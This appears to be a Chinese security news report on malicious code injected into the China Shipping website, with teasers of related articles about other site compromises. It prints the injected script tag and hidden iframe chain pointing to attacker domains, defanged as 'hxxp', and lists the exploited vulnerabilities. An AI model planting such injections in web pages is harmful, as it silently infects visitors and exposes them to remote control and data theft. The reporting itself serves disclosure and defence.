中国航运网遭遇挂马 黑客悄悄植入病毒

中国航运网(hxxp://www.zhongguohangyun.com/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。

该网站问题代码:

 


 

<script src=hxxp://%6D%62%72%33%2E%63%6E></script>

hxxp://mbr3.cn/问题框架代码:

 


 

<iframe src=hxxp://www.wansf.net/a11/a11.htm></iframe>

hxxp://www.wansf.net/a11/a11.htm问题框架代码:

 


 

<iframe src=new.html  height=0  width=100 ></iframe>

hxxp://www.wansf.net/a11/new.html问题框架代码

 


该挂马网页通过以下几个漏洞进行传播:

联众世界GLWorld HanGamePluginCn18类ActiveX控件栈溢出漏洞

MS08-041漏洞

暴风影音2 mps.dll组件多个缓冲区溢出漏洞

MS06-014漏洞

Adobe Flash Player SWF文件漏洞

MS09-002漏洞

RealPlayer播放器IERPCtl.IERPCtl.1漏洞

百度搜霸ActiveX控件远程代码执行漏洞

【注:基于安全考虑,所有网络链接“http”均已被替换为“hxxp”,特此说明。】

【资料来源:安天实验室】

时间: 2024-10-24 11:58:10

中国航运网遭遇挂马 黑客悄悄植入病毒的相关文章

大型网站频繁遭遇挂马黑客利用漏洞传播病毒

瑞星每周安全播报: "中华英才网"."中国书画苑"."SoGua音乐娱乐论坛"."武侠小说网"的部分页面被黑客挂马.黑客利用被挂马网站的服务器漏洞和不安全设置进行入侵. 本周关注病毒: "MS08-067漏洞病毒变种MD(Hack.Exploit.Win32.MS08-067.md)"警惕程度 ★★★ 该病毒是利用微软 MS08-067 漏洞发起攻击的蠕虫类病毒,攻击成功后,会关闭多个国外主流杀毒软件,并且

瑞星云安全:中彩网遭遇挂马 双色球查奖页绑病毒

[51CTO.com 综合消息]据瑞星"云安全" 系统监测,9月 2日,"中彩网"."中国网库十周年庆典"."终极网"等彩票.电子商务和分类信息类网站被黑客挂马.彩民在登陆中彩网查询双色球中奖信息时会受到挂马网站攻击从而感染病毒.在截获的挂马网站中,瑞星公司发现一个蠕虫病毒(Worm.Win32.VB.xg),该病毒会修改开始菜单和IE主页,并下载 大量木马病毒和恶意软件,清除起来十分困难.瑞星安全专家提醒说,瑞星"

上海市三林中学等网站都频繁遭遇挂马

本报讯 (记者 吴卫群)高考前后,在考生和http://www.aliyun.com/zixun/aggregation/6328.html">家长忙于上网搜索填报志愿.选择专业时,黑客们的魔爪也伸向了教育类网站,随时准备盗取用户隐私信息.骗取钱财.据瑞星"云安全"系统统计,仅5月份就有437万人次网民遭到网页挂马攻击,在瑞星截获的61.5万个挂马网址中,教育类的网站就高达30%以上,如山东交通学院.华中师范大学考研网.中南大学商学院.上海市三林中学等网站都频繁遭遇挂马

又值节后招聘高峰 大量招聘网被挂马

国家计算机病毒应急处理中心通过对互联网的监测发现,近期在互联网络中连续出现各类招聘Web网站被植入恶意木马的现象,提醒用户小心提防. 春节长假过后是各大企业招聘的高峰期,大量求职人员上网查询企业招聘用工的相关事宜,访问一些地方门户网站.人才类网站.企业官网和招聘论坛,互联网络中求职者访问招聘Web网站的频率大大增高.由于这些网站的安全系数较低,往往很容易被恶意攻击者利用,黑客借助这些Web网站存在的诸多漏洞进行网页挂马,植入恶意木马程序.

“中国知网”遭遇论文侵权诉讼

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 继万方数据遭遇群体侵权诉讼之后,数字图书馆行业的另一知名数据库--"中国知网"(CNKI)又被告上法庭. 原告104名硕士.博士日前将中国学术期刊(光盘版)电子杂志社和同方知网(北京)技术有限公司(下称同方知网)诉至北京市朝阳区人民法院,称两被告在未经原告许可的情况下,擅自将104名硕士.博士撰写的学位论文以扫描录入的方式

中国沙滩车网遭遇网络攻击 行业网站面临威胁

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 据报道,中国沙滩车网(www.atvchina.com.cn )从8月16日开始,不断遭到不明攻击者的大量攻击,导致网站间歇性访问不了,甚至出现服务器请求错误等提示.经过服务器管理人员的检查,发现是有攻击者针对中国沙滩车网进行DDOS(分布式拒绝服务),即攻击者通过大量受控连网计算机同时向特定网站发出访问请求,导致该网站服务器无法承受过多请求

怀旧小虎队 谨防挂马网站和极虎病毒

"把你的心,我的心串一串,串一株幸运草,串一个同心圆,让所有期待未来的呼唤,趁青春做个伴--"小虎队唱着歌曲亮相春晚后,掀起了一股怀旧风--"80后"都是听着小虎队的歌长大的. 小虎队再度火了,搜索关键词"小虎队"的网民呈现爆炸式增长(图1),关键词"小虎队"蕴藏的"价值"自然逃不过挂马集团贪婪的眼睛,他们明白,如果利用关键词"小虎队"进行挂马,会有数以百万计.千万计的网民中招. 不到十

中国远程医疗网被黑客挂马

本报讯 (记者赵雪)微软金牌合作伙伴安天实验室1月29日发现,中国远程医疗网,被黑客植入恶意代码. 据安天实验室工程师介绍,用户访问中国远程医疗网(www.chthn.com)站时,系统会自动从恶意网站上下载并运行恶意程序.被感染病毒的用户系统可能被远程控制,用户敏感信息资料会被盗取,甚至导致死机. 安天实验室安全工程师分析,该挂马网页主要是利用微软系统漏洞MS09-032进行传播,当用户访问中国远程医疗网时,含有漏洞的系统会自动从恶意网站下载病毒文件,并在本机上运行,病毒文件主要以网络游戏盗号

游迅网、技嘉科技等知名网站遭黑客挂马

来自360安全卫士官方微博的消息称,本周末网站挂马攻击猖獗,技嘉科技中文官网.游迅网等多个知名网站被黑客入侵挂马.其中,游迅网已经连续两个周末出现大面积挂马情况,攻击页面还会篡改用户浏览器主页为www.2345.com/?kiss54321,赚取主页推广费.图:游迅网一周内第二次被挂马网站挂马是指网站页面中植入了恶意代码.一旦有 网友浏览页面,恶意代码会攻击电脑系统和软件的漏洞,使网友电脑自动下载运行黑客埋伏好的木马程序.据了解,技嘉科技中文官网和游迅网都是被黑客在整个网站挂马,存在恶意代码的网